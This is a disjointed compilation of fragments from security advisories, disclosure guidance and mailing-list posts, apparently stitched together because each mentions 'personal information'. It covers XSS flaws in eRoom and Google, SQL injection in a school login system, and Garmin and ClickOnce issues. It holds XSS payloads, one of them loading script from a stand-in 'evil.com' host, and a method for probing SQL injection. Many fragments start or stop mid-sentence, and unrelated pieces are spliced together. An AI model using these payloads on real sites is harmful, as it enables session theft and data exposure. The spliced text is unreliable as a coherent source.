personal information
1. Do not disclose any aspect of the vulnerability to ANYONE until
you have formally notified the leadership of the company
(The company will provide you with disclosure guidelines after
they have been formally notified)
2. Research the state and federal statutes related to the protection
of personal information and breach notification
(Take special notice if you fall under special regulations like
HIPAA or SOX)
3. Create a document to present to the company leadership:
a. Prepare a complete analysis of the vulnerability including the
exact steps needed to repeat the exploit
file."><script>alert(1)</script>
."><script src="http://evil&#x2e;com/evil%2ejs"></script>
."><script src="/eRoomReq/Files/facility/eRoom/0_f000/test%2etxt"></script>
2) Permanent Cross-Site Scripting within the personal information
Users can change their personal information. By editing the field
"organization" it is possible to store a malicious JavaScript payload
(e.g., <script>alert(1)</script>).
The payload gets executed every time a user visits a part of the website
responsible for alerting users about changes in the eRoom (i.e., "Choose
Impact: high
Found: months ago
The login screens of the school administration database system, "login.asp" and "inloggning.asp", as used in an unnamed school district in Finland, contain SQL injection vulnerabilities, which can be easily detected by inserting '||' (the Oracle string concatenation operator and ending and starting quotes) within a valid password or username (they still work), or adding an odd number of quotes (resulting in an exception). The "input validation" in JavaScript must be "defeated" first - there are no signs of any validation done server side.
The program also contains other SQL injection vulnerabilities in text fields etc. accessible after login - especially ones that are used to search for information, which may allow compromise of sensitive personal information in the database via injection to a SELECT query.
The program prints exception handlers to the browser, including Oracle database error strings.
The session cookie lacks the 'secure' flag, and if a logged-in user clicks a link with the http: scheme (such links exist in the school district's web pages) the cookie will be sent in plain text.
Privacy Theme
-------------
Privacy concerns the operational policies, procedures and regulations
implemented within an information system to control for the unauthorized
use of, access to, or release of personal information held in any format.
Topics of interest in this theme include (but are not limited to):
* privacy preserving/enhancing technologies
* identity management and biometrics
* privacy and ubiquitous computing, e.g. RFIDs
- Create a new page
Because these modules' input variables are not adequately checked and
filtered, an attacker can insert code into the path's links. If a user
logs in to his blog and clicks the link, the attacker's malicious JavaScript
will be executed, leading to the loss of the user's personal information saved
in the browser.
CSRF vulnerabilities are found on the following modules:
- Edit a user
- Setting
Reported: 11 October 2007
Occurred: 02 October 2007
Incident Type: Vulnerability Disclosure
WASC Threat Classification: Insufficient Authorization
Personal information on anyone who worked or volunteered for the
Pembroke schools in the last four years was accessible via the Internet
because of a weakness in the district's computer system. The
information, including names, birth dates and Social Security numbers,
was available from May until Oct. 2, when school officials learned of
the problem.
http://www.q2solutions.com.au/
"ConnX is a ready built internet/intranet solution that empowers employees and
management to view and update HR and Payroll information. Internal communications
are improved by providing easy access to Company and personal information for
all employees."
Versions tested:
Version 4.0.20080606 has been confirmed as vulnerable. Other versions untested.
Nam
On 9 May 2009 02:03:15 -0000
Inferno@SecureThoughts.com wrote:
Universal XSS Vulnerability in all Google Services can compromise your personal information
May 8th, 2009
Vulnerability Reported: 04/18/2009 9.33 pm
Google’s Response: 04/18/2009 10.19 pm (Wow! that was super fast for Saturday :))
Vulnerability Fixed: 05/05/2009 7.05 pm
Change Propagated: 05/07/2009 3.19 pm
I recently reported a cross-site scripting flaw to Google, which is now fixed. The vulnerability existed in Google's Support Python Script where a malicious URL is not sanitized for the XSS character ' (single quote) before being put inside the JavaScript variable logURL. As a result, it was possible to break the encapsulation of the var declaration and execute arbitrary JavaScript commands on the main Google.com domain.
This can be exploited to bypass the domain locking and dialog box
presented to the user asking for confirmation that the untrusted site
may access private data.
Successful exploitation allows full access (such as deleting data,
retrieving personal information, or installing firmware updates) to
any Garmin GPS products connected to the user's system.
1) Introduction
===============
Rising Firewall 2009
RISING Firewall is a customizable personal information security product designed to protect your computer from attacks while online.
(from Rising Firewall website)
#####################################################################################
[Snip..]
I. Background
~~~~~~~~~~~~~
Quote:"Trend Micro Incorporated is a global leader in network antivirus and Internet content security software and services. Founded in 1988, Trend Micro was a pioneer in secure content and threat management, leading the migration of early virus protection from the desktop to the network server and the Internet gateway. Today, the company continues to advance its comprehensive approach to management of content security threats into the Internet cloud, encompassing information flow beyond the boundaries of the network. With its 24x7 global support operations and dedication to innovative technologies and methodologies, Trend Micro is well positioned to protect its customers against an expanding range of threats that silently endanger business operations, personal information, and property."
location and as requested in the application manifest).
If no elevated permissions are requested, the application is launched
without any warning dialog. Instead the .NET Framework presents a
warning message in which users are warned not to enter personal
information or passwords in the displayed window unless they trust its
source (see figure below).
http://www.akitasecurity.nl/advisory/AK20100601/003-clickonce_internet_zone_warning.png
Figure 3: Security warning for applications running in the Internet
zone.
Commenting, favorites and the ability to view the favorites of the people you follow.
CVE and OSVDB integration
Privacy settings for all personal information
You can send messages to other users
You can switch to a minimal listing view